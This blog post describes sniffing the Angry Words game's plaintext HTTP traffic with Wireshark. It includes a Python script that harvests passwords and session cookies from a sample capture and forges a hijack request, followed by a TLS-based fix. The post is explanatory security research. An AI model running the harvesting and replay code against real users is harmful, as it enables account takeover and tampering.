How to (honourlessly) win in Angry Words

In my scarce free time I usually play Angry Words. For those who have never heard of it (quite unlikely if you're reading this article), Angry Words is basically Scrabble played online against different opponents. There are currently versions for Android and iPhone.

Recently, in May 2011, a security hole was reported in WhatsApp that left user accounts open to hijacking. Since May 2011 it has also been reported that WhatsApp's communications are not encrypted: data is sent and received in plain text, so messages can be read easily by anyone holding a packet trace. Together with the well-known way the application stores the full set of messages sent and received (which can be easily cracked), this made me wonder whether that was one particularly disastrous piece of development or a generalized trend in mobile applications. Therefore, I decided to see whether the same could be done with Angry Words.

 

If you want to reproduce this article, you will need to set up your environment to sniff the data from your mobile. There are many ways to achieve this (install a cracked .apk or .ipa in your emulator and capture the data, root your Android device and capture the data with a sniffer on it, and so on), but for me the easiest one was to use my computer as a bridge for my phone and use Wireshark to sniff the data. The process is quite simple: you just need to activate the "Internet Sharing" option, using your AirPort as a bridge to your Ethernet connection (if you don't have an Ethernet connection, you will surely still have the option to tether your phone). In System Preferences – Sharing – Internet Sharing proceed as shown in the following image (the screenshot is not reproduced here):

You probably get the idea: the point is to connect the device through your computer and sniff the traffic from there. It is outside the scope of this article to teach how to use Wireshark, but you can find many tutorials on the Internet. Basically, once your device is connected, start Wireshark on your computer and attach it to the AirPort (Wi-Fi) interface. You normally need to start Wireshark as the super-user in order to have enough rights to capture traffic. You can do this by typing sudo wireshark &.

We want to capture packets on the AirPort interface, which will very likely be en1. Click the leftmost button on the Wireshark toolbar, and then click "Start" next to device en1.

Once this is set up and your device is connected to your computer, you will start seeing every packet. Since Wireshark does not discriminate between applications, it is a good idea to filter the packets that are displayed. For this purpose, create a display filter that keeps only traffic to or from the phone:

ip.src == xx.xx.xx.xx || ip.dst == xx.xx.xx.xx

The xx.xx.xx.xx value is the private IP that your phone was assigned when connecting to your computer. In my case, this IP is 10.2.2.2.

Now only the packets belonging to our device are displayed, so it's time to play. By opening Angry Words and playing, we will see each request sent by the application (and each response received from the server). We will soon notice some weaknesses:

  • The application uses plain HTTP, with no SSL/TLS in between. We can read every request as it goes over the wire. We can log in to the application through Facebook Auth, or with our e-mail and password; if we use the second way, even the password is sent in plain text.
  • All the information about each game is stored on the server (since we can access it from different devices), which makes it a little more complicated to tamper with an already created game. But it can be achieved with a man-in-the-middle attack, which is not hard when we are already using our own computer as the phone's proxy (and by altering the response, we can also decide whether a word is right or not).
  • With each connection a cookie value is created. This cookie value has to be sent with every request, and it is all the server uses to validate them. Since it travels in plain text too, anyone on the same network can read it and reuse it without ever knowing the password.
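As an added example (this is not code from the original post), the following Python script does in code what the Wireshark filter and the three findings above describe: it keeps only the packets to or from the phone's IP, parses the plaintext HTTP, recovers the login password and the session cookie, and builds a replay request that reuses the stolen cookie. The capture is constructed by hand; the host game.example, the /login and /game/42 paths, the form field names and the cookie name are placeholders, not the real Angry Words protocol.

```python
"""Sniffer's view of a plain-HTTP mobile app (added example, not from the post).

CAPTURE is a hand-constructed stand-in for the TCP payloads Wireshark shows;
host, paths, field names and the cookie name are placeholders, not the real
Angry Words protocol.
"""
from urllib.parse import parse_qs

PHONE_IP = "10.2.2.2"  # the private address Internet Sharing gave the phone

# (src, dst, TCP payload). Constructed for this example.
CAPTURE = [
    # 1. login with e-mail and password: the form body goes out in the clear
    ("10.2.2.2", "203.0.113.10",
     b"POST /login HTTP/1.1\r\n"
     b"Host: game.example\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n"
     b"Content-Length: 42\r\n\r\n"
     b"email=alice%40example.com&password=hunter2"),
    # 2. the server answers with the session cookie, also in the clear
    ("203.0.113.10", "10.2.2.2",
     b"HTTP/1.1 200 OK\r\n"
     b"Set-Cookie: session=deadbeef1234\r\n"
     b"Content-Length: 2\r\n\r\n"
     b"ok"),
    # 3. every later request carries that cookie as its only credential
    ("10.2.2.2", "203.0.113.10",
     b"GET /game/42 HTTP/1.1\r\n"
     b"Host: game.example\r\n"
     b"Cookie: session=deadbeef1234\r\n\r\n"),
    # 4. noise from another host on the shared network; the filter drops it
    ("192.168.1.5", "198.51.100.7",
     b"GET / HTTP/1.1\r\nHost: other.example\r\n\r\n"),
]


def phone_packets(capture, phone_ip):
    """Code equivalent of the display filter ip.src == phone || ip.dst == phone."""
    return [pkt for pkt in capture if phone_ip in (pkt[0], pkt[1])]


def parse_http(payload):
    """Split one HTTP message into (start line, lowercase header dict, body)."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def harvest(capture, phone_ip):
    """Recover (email, password) and the session cookie from the phone's traffic.

    Returns ((email, password) or None, cookie or None).
    """
    creds = None
    cookie = None
    for _src, _dst, payload in phone_packets(capture, phone_ip):
        start, headers, body = parse_http(payload)
        ctype = headers.get("content-type", "")
        if start.startswith("POST") and ctype.startswith("application/x-www-form-urlencoded"):
            form = parse_qs(body.decode("latin-1"))
            if "email" in form and "password" in form:
                creds = (form["email"][0], form["password"][0])
        if "set-cookie" in headers:
            cookie = headers["set-cookie"].split(";")[0]  # keep only name=value
    return creds, cookie


def forge_request(cookie, path, host="game.example"):
    """Build a request that hijacks the session: the cookie is all the server checks."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie}\r\n\r\n").encode("latin-1")


if __name__ == "__main__":
    creds, cookie = harvest(CAPTURE, PHONE_IP)
    print("credentials:", creds)
    print("session cookie:", cookie)
    print(forge_request(cookie, "/game/42").decode("latin-1"))
```

The forged request is only built, never sent; the point is that nothing but a value visible on the wire stands between an attacker on the same Wi-Fi and your game.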

Let's see some examples of captured data (the screenshots of the captures are not reproduced here):

  • A request for the information about a particular game.
  • The response to a request checking whether a word is valid: all the information comes back in plain text.
  • The interesting part: the request that sends a tile to the server.
  • The request that resigns a game.

So, after analyzing all the possible actions in a game, we can conclude the following:

Every one of those requests (except the check on whether a word is valid) has to carry the value of the cookie. To create custom HTTP requests, depending on your operating system, I would recommend Fiddler on Windows. On Mac I'm not sure whether Firebug lets you create custom HTTP requests, so I'm using Simple Rest Client for this article, and it works pretty well. But there are plenty of other tools around.

How can this be solved?

The obvious fix is to put the whole API behind SSL/TLS, although that requires some changes and time on the server side. Manipulating requests by hand also takes time (unless we automate it), so a tight timeout on each move would make the attack harder. I want to remark that, although the requests can be sent from a computer or an automated program, manipulating the data sent back by the server is only possible when the attacker sits on the network path, for instance on the same Wi-Fi network. So, if you suspect your Angry Words partner might be a hacker, disconnect your Wi-Fi while playing against him or her. Bear in mind that this only removes the attacker on your local network; the traffic still travels in plain text, and only encrypting the connection actually solves the problem.
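The following Python is an added example (not code from the original post or from the Angry Words developers) of the client-side half of that fix: it refuses plaintext URLs outright, verifies the server certificate and hostname so a proxy on the shared Wi-Fi cannot impersonate the server, puts a timeout on each request, and shows the attributes the server should set on its session cookie once it runs over TLS. It assumes the game server has moved to HTTPS; game.example, the paths and the cookie name are placeholders.

```python
"""Client-side half of the fix (added example, not from the original post).

Assumes the game server has moved to HTTPS; game.example and the paths are
placeholders.  Nothing here touches the network when imported or when the
connection object is created.
"""
import http.client
import ssl
from urllib.parse import urlsplit

REQUEST_TIMEOUT = 15  # seconds; illustrative value, not from the post


def tls_context():
    """Strict TLS: require a valid certificate chain and a matching hostname.

    A proxy on the shared Wi-Fi cannot present a certificate for the game
    host that chains to a trusted CA, so the man-in-the-middle fails instead
    of silently succeeding.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def verifies_peer(ctx):
    """True when the context refuses unverified or misnamed servers."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


def open_connection(url, timeout=REQUEST_TIMEOUT):
    """Return an HTTPSConnection for url; refuse http:// rather than downgrade.

    http.client opens the socket lazily on the first request, so calling
    this offline is safe.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"refusing plaintext connection to {url}")
    return http.client.HTTPSConnection(parts.hostname, parts.port or 443,
                                       timeout=timeout, context=tls_context())


def session_cookie(value, name="session"):
    """Set-Cookie value the server should send once it is behind TLS.

    Secure stops the HTTP stack from ever sending the cookie over plain
    HTTP, HttpOnly keeps scripts away from it, and SameSite=Strict blocks
    cross-site reuse.
    """
    return f"{name}={value}; Secure; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    conn = open_connection("https://game.example/game/42")
    print("peer verified:", verifies_peer(tls_context()), "timeout:", conn.timeout)
    print(session_cookie("deadbeef1234"))
    try:
        open_connection("http://game.example/login")
    except ValueError as err:
        print(err)
```

The server-side counterpart is simply to stop answering on plain HTTP at all; as long as the API is reachable over port 80, a client that downgrades (or an attacker who strips TLS) gets the old behaviour.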

 

You can contact me on my private email, or leave a message as a comment. If the post has been helpful for you, consider being nice and cite me if you’re going to use it.
